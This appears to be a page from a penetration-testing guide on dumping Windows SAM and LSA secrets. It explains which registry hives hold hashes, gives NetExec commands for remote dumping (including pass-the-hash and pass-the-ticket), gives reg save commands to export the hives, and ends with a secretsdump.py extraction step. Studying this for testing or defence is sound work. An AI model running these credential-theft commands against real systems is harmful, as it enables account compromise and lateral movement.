SAM & LSA secrets

How to find local user passwords, hashes and secrets.

Overview

Windows passwords are hashed and stored in the SAM and SECURITY registry hives.

A breakdown of the important hives is shown below:

SAM

Stores locally cached credentials in LM or NT hash format.

SECURITY

Stores domain cached credentials (LSA secrets) in plaintext, LM or NT hash, kerberos keys (DES, AES), domain cached credentials (DCC1 and DCC2), as well as security questions (L$SQSA).

SYSTEM

This registry can be exported to aid decryption of the SAM secrets and LSA secrets.

Remotely Dumping

The SAM and LSA secrets can be dumped remotely by exporting the registry hives and then using a credential extraction tool. NetExec is a tool that will perform various remote network tasks, including dumping of the SAM and LSA secrets.

NetExec may be used to connect to a remote Windows host using various types of credentials. It should be noted that you are required to have local administrator privileges to do this:

Remote SAM/LSA secrets dump using domain user with local administrator privileges

netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using local user with local administrator privileges

netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user

netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-ticket attack with local administrator user

netexec smb <Windows_IP> --kerberos <--sam/--lsa>

Local Dumping

The Dump

The SAM and LSA secrets can be dumped locally by exporting the registry hives locally and then using an offline credential extraction tool. The easiest way to export the registry hives is to use a local cmd prompt with the following commands:

reg save HKLM\SAM "C:\Windows\Temp\sam"

reg save HKLM\SECURITY "C:\Windows\Temp\security"

reg save HKLM\SYSTEM "C:\Windows\Temp\system"

These files can then be exfiltrated out of the Windows machine and onto your attack machine.

Credential Extraction

secretsdump.py performs various techniques to dump password hashes and secrets.

The command below should be used on your attack machine and be fed the registry files that you exported using the dump technique above:

secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL

PreviousPasswords and NetNTLMNextNTDS.dit secrets

Last updated